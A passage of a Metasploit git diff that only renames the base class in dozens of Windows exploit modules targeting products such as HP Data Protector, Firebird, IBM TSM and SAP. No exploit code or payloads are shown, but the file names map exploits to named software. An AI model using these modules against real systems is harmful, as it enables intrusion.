Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb index 66d3145b80..8c3b562bb9 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb index 2d36e4ee08..0b1bc3af0e 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/doubletake.rb b/modules/exploits/windows/misc/doubletake.rb index 9130d3ad0a..652a47b318 100644 --- a/modules/exploits/windows/misc/doubletake.rb +++ b/modules/exploits/windows/misc/doubletake.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/eiqnetworks_esa.rb b/modules/exploits/windows/misc/eiqnetworks_esa.rb index c5cc523440..182529c547 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb index ba6caf4a42..a8e30a3347 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb b/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb index f3d90b8117..06d9db5514 100644 --- a/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb +++ b/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/eureka_mail_err.rb b/modules/exploits/windows/misc/eureka_mail_err.rb index 9c59408ddc..c3fe494a52 100644 --- a/modules/exploits/windows/misc/eureka_mail_err.rb +++ b/modules/exploits/windows/misc/eureka_mail_err.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/fb_cnct_group.rb b/modules/exploits/windows/misc/fb_cnct_group.rb index 084c331db4..8ff8efb552 100644 --- a/modules/exploits/windows/misc/fb_cnct_group.rb +++ b/modules/exploits/windows/misc/fb_cnct_group.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/fb_isc_attach_database.rb b/modules/exploits/windows/misc/fb_isc_attach_database.rb index f0ccc69f63..05a46b2e0b 100644 --- a/modules/exploits/windows/misc/fb_isc_attach_database.rb +++ b/modules/exploits/windows/misc/fb_isc_attach_database.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/fb_isc_create_database.rb b/modules/exploits/windows/misc/fb_isc_create_database.rb index d85485c26a..fe2dd7dda5 100644 --- a/modules/exploits/windows/misc/fb_isc_create_database.rb +++ b/modules/exploits/windows/misc/fb_isc_create_database.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/fb_svc_attach.rb b/modules/exploits/windows/misc/fb_svc_attach.rb index fca3bb11bf..6777ab018a 100644 --- a/modules/exploits/windows/misc/fb_svc_attach.rb +++ b/modules/exploits/windows/misc/fb_svc_attach.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/gimp_script_fu.rb b/modules/exploits/windows/misc/gimp_script_fu.rb index 2fa4784861..428a212d00 100644 --- a/modules/exploits/windows/misc/gimp_script_fu.rb +++ b/modules/exploits/windows/misc/gimp_script_fu.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb b/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb index 3626d62b2c..bed56d43b5 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_dataprotector_crs.rb b/modules/exploits/windows/misc/hp_dataprotector_crs.rb index 7dd833c3c0..d7fb42f35a 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_crs.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_crs.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb b/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb index 807267a2c2..f7f8daced8 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb b/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb index 5c85510fb9..252d867067 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb b/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb index 0286f2ec02..be2dd1969d 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_dataprotector_traversal.rb b/modules/exploits/windows/misc/hp_dataprotector_traversal.rb index a61d414c6c..7fda233630 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_traversal.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_traversal.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_imc_uam.rb b/modules/exploits/windows/misc/hp_imc_uam.rb index 8055b0d947..f11b3c052c 100644 --- a/modules/exploits/windows/misc/hp_imc_uam.rb +++ b/modules/exploits/windows/misc/hp_imc_uam.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb index fb664c9ae6..cfdeb7b423 100644 --- a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb +++ b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_magentservice.rb b/modules/exploits/windows/misc/hp_magentservice.rb index 80b04a5bdc..13c98bedf1 100644 --- a/modules/exploits/windows/misc/hp_magentservice.rb +++ b/modules/exploits/windows/misc/hp_magentservice.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_omniinet_1.rb b/modules/exploits/windows/misc/hp_omniinet_1.rb index b168c6ff5a..2fafe34030 100644 --- a/modules/exploits/windows/misc/hp_omniinet_1.rb +++ b/modules/exploits/windows/misc/hp_omniinet_1.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_omniinet_2.rb b/modules/exploits/windows/misc/hp_omniinet_2.rb index 404dd0458a..4d4304f028 100644 --- a/modules/exploits/windows/misc/hp_omniinet_2.rb +++ b/modules/exploits/windows/misc/hp_omniinet_2.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_omniinet_3.rb b/modules/exploits/windows/misc/hp_omniinet_3.rb index f8aeca8a72..9710c6475f 100644 --- a/modules/exploits/windows/misc/hp_omniinet_3.rb +++ b/modules/exploits/windows/misc/hp_omniinet_3.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_omniinet_4.rb b/modules/exploits/windows/misc/hp_omniinet_4.rb index 2670342a6c..43ab3023d4 100644 --- a/modules/exploits/windows/misc/hp_omniinet_4.rb +++ b/modules/exploits/windows/misc/hp_omniinet_4.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb index 67a59e7911..055a6d0818 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb index d9e85a05f9..6ddbbd70e0 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_ovtrace.rb b/modules/exploits/windows/misc/hp_ovtrace.rb index 0612f411ef..57235be34e 100644 --- a/modules/exploits/windows/misc/hp_ovtrace.rb +++ b/modules/exploits/windows/misc/hp_ovtrace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ib_isc_attach_database.rb b/modules/exploits/windows/misc/ib_isc_attach_database.rb index 85ad7d3da3..9d376177d8 100644 --- a/modules/exploits/windows/misc/ib_isc_attach_database.rb +++ b/modules/exploits/windows/misc/ib_isc_attach_database.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ib_isc_create_database.rb b/modules/exploits/windows/misc/ib_isc_create_database.rb index 794f12d3c6..e5a42def26 100644 --- a/modules/exploits/windows/misc/ib_isc_create_database.rb +++ b/modules/exploits/windows/misc/ib_isc_create_database.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ib_svc_attach.rb b/modules/exploits/windows/misc/ib_svc_attach.rb index ce739237e8..e41a07a8c8 100644 --- a/modules/exploits/windows/misc/ib_svc_attach.rb +++ b/modules/exploits/windows/misc/ib_svc_attach.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb b/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb index 7d538a816f..dc19f9465b 100644 --- a/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb +++ b/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb index b8b84e1f1c..f8ad044e14 100644 --- a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb +++ b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb b/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb index cf81053e33..2f6565288e 100644 --- a/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb +++ b/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb index 1457cd8de1..30c2c2f32d 100644 --- a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb +++ b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/itunes_extm3u_bof.rb b/modules/exploits/windows/misc/itunes_extm3u_bof.rb index e101f6beda..32688a7397 100644 --- a/modules/exploits/windows/misc/itunes_extm3u_bof.rb +++ b/modules/exploits/windows/misc/itunes_extm3u_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/misc/landesk_aolnsrvr.rb b/modules/exploits/windows/misc/landesk_aolnsrvr.rb index fc6e775b23..15cb335962 100644 --- a/modules/exploits/windows/misc/landesk_aolnsrvr.rb +++ b/modules/exploits/windows/misc/landesk_aolnsrvr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/lianja_db_net.rb b/modules/exploits/windows/misc/lianja_db_net.rb index 9831813bbc..c67b0b4630 100644 --- a/modules/exploits/windows/misc/lianja_db_net.rb +++ b/modules/exploits/windows/misc/lianja_db_net.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::RopDb diff --git a/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb b/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb index 1d451f3d3d..69a50db9ef 100644 --- a/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb +++ b/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/misc/mercury_phonebook.rb b/modules/exploits/windows/misc/mercury_phonebook.rb index a856002418..a31e6fe560 100644 --- a/modules/exploits/windows/misc/mercury_phonebook.rb +++ b/modules/exploits/windows/misc/mercury_phonebook.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/mini_stream.rb b/modules/exploits/windows/misc/mini_stream.rb index 19c613356f..ea37d663f9 100644 --- a/modules/exploits/windows/misc/mini_stream.rb +++ b/modules/exploits/windows/misc/mini_stream.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/misc/mirc_privmsg_server.rb b/modules/exploits/windows/misc/mirc_privmsg_server.rb index c147e4ca8a..d5a014f7bc 100644 --- a/modules/exploits/windows/misc/mirc_privmsg_server.rb +++ b/modules/exploits/windows/misc/mirc_privmsg_server.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/ms07_064_sami.rb b/modules/exploits/windows/misc/ms07_064_sami.rb index 8450f0562a..4431d5cda9 100644 --- a/modules/exploits/windows/misc/ms07_064_sami.rb +++ b/modules/exploits/windows/misc/ms07_064_sami.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/ms10_104_sharepoint.rb b/modules/exploits/windows/misc/ms10_104_sharepoint.rb index c61e866b07..c90fdf1bfb 100644 --- a/modules/exploits/windows/misc/ms10_104_sharepoint.rb +++ b/modules/exploits/windows/misc/ms10_104_sharepoint.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/misc/netcat110_nt.rb b/modules/exploits/windows/misc/netcat110_nt.rb index a89f98e2de..9c1051e9a5 100644 --- a/modules/exploits/windows/misc/netcat110_nt.rb +++ b/modules/exploits/windows/misc/netcat110_nt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/nettransport.rb b/modules/exploits/windows/misc/nettransport.rb index 20139031b8..0ce86b0387 100644 --- a/modules/exploits/windows/misc/nettransport.rb +++ b/modules/exploits/windows/misc/nettransport.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/nvidia_mental_ray.rb b/modules/exploits/windows/misc/nvidia_mental_ray.rb index 82a4b8f7a3..14f2f2b985 100644 --- a/modules/exploits/windows/misc/nvidia_mental_ray.rb +++ b/modules/exploits/windows/misc/nvidia_mental_ray.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/poisonivy_bof.rb b/modules/exploits/windows/misc/poisonivy_bof.rb index ed26b02365..a6a3c39f3a 100644 --- a/modules/exploits/windows/misc/poisonivy_bof.rb +++ b/modules/exploits/windows/misc/poisonivy_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/poppeeper_date.rb b/modules/exploits/windows/misc/poppeeper_date.rb index a5637b1b3e..4d06b27d1a 100644 --- a/modules/exploits/windows/misc/poppeeper_date.rb +++ b/modules/exploits/windows/misc/poppeeper_date.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/poppeeper_uidl.rb b/modules/exploits/windows/misc/poppeeper_uidl.rb index ef53ef6207..bf9c337fb5 100644 --- a/modules/exploits/windows/misc/poppeeper_uidl.rb +++ b/modules/exploits/windows/misc/poppeeper_uidl.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/realtek_playlist.rb b/modules/exploits/windows/misc/realtek_playlist.rb index 9a477457b6..6e1aba3dca 100644 --- a/modules/exploits/windows/misc/realtek_playlist.rb +++ b/modules/exploits/windows/misc/realtek_playlist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/misc/sap_2005_license.rb b/modules/exploits/windows/misc/sap_2005_license.rb index 54caf13f2d..2491454f94 100644 --- a/modules/exploits/windows/misc/sap_2005_license.rb +++ b/modules/exploits/windows/misc/sap_2005_license.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb b/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb index 0b08956557..e60a49b385 100644 --- a/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb +++ b/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/shixxnote_font.rb b/modules/exploits/windows/misc/shixxnote_font.rb index 1b536ec7a4..cbf1d759e7 100644 --- a/modules/exploits/windows/misc/shixxnote_font.rb +++ b/modules/exploits/windows/misc/shixxnote_font.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb b/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb index c929b1db48..a344ac0495 100644 --- a/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb +++ b/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/splayer_content_type.rb b/modules/exploits/windows/misc/splayer_content_type.rb index 988b83a081..b9ee505e51 100644 --- a/modules/exploits/windows/misc/splayer_content_type.rb +++ b/modules/exploits/windows/misc/splayer_content_type.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/misc/stream_down_bof.rb b/modules/exploits/windows/misc/stream_down_bof.rb index 1d1237953b..c1382fc632 100644 --- a/modules/exploits/windows/misc/stream_down_bof.rb +++ b/modules/exploits/windows/misc/stream_down_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/windows/misc/talkative_response.rb b/modules/exploits/windows/misc/talkative_response.rb index 4b867975e7..a5c9dbf62f 100644 --- a/modules/exploits/windows/misc/talkative_response.rb +++ b/modules/exploits/windows/misc/talkative_response.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/tiny_identd_overflow.rb b/modules/exploits/windows/misc/tiny_identd_overflow.rb index cf947bc553..badc118829 100644 --- a/modules/exploits/windows/misc/tiny_identd_overflow.rb +++ b/modules/exploits/windows/misc/tiny_identd_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb b/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb index a7c7d48bfa..5d7633d681 100644 --- a/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb +++ b/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ufo_ai.rb b/modules/exploits/windows/misc/ufo_ai.rb index de6bdafa9a..867c0421e8 100644 --- a/modules/exploits/windows/misc/ufo_ai.rb +++ b/modules/exploits/windows/misc/ufo_ai.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/windows_rsh.rb b/modules/exploits/windows/misc/windows_rsh.rb index d6acee9bb0..2353005d44 100644 --- a/modules/exploits/windows/misc/windows_rsh.rb +++ b/modules/exploits/windows/misc/windows_rsh.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/wireshark_lua.rb b/modules/exploits/windows/misc/wireshark_lua.rb index 34fe258f61..89532ded49 100644 --- a/modules/exploits/windows/misc/wireshark_lua.rb +++ b/modules/exploits/windows/misc/wireshark_lua.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < 